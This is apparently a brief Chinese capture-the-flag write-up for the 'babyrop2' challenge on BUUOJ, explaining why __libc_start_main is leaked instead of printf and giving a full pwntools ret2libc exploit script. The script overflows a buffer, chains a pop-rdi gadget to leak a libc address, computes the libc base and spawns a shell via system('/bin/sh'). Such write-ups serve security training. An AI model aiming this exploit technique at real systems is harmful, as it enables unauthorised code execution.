ret2libc。记一下因为这里的libc版本为libc6_2.27-3ubuntu1.2_amd64,printf()
的plt表地址结尾为f00,会产生截断,所以不能用printf()
泄露。可以使用__libc_start_main
。
from pwn import * elf = ELF('./babyrop2') local = 0 if local == 1: io = process('./babyrop2') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') else: io = remote('node4.buuoj.cn',25717) libc = ELF('libc.so.6') printf_plt = elf.plt['printf'] printf_got = elf.got['printf'] libc_start_main = elf.got['__libc_start_main'] main_addr = 0x400636 rdi_ret = 0x0000000000400733 payload = 'a'*0x20+p64(0xdeadbeef)+p64(rdi_ret)+p64(libc_start_main)+p64(printf_plt)+p64(main_addr) io.sendline(payload) io.recvline() libc_start_main_addr = u64(io.recv(6)+'\x00\x00') libc_base = libc_start_main_addr - libc.symbols['__libc_start_main'] log.success("libc_base:"+hex(libc_base)) system_addr = libc_base + libc.symbols['system'] binsh = libc_base + libc.search('/bin/sh').next() payload = 'a'*0x20+p64(0xdeadbeef)+p64(rdi_ret)+p64(binsh)+p64(system_addr) io.sendline(payload) io.interactive()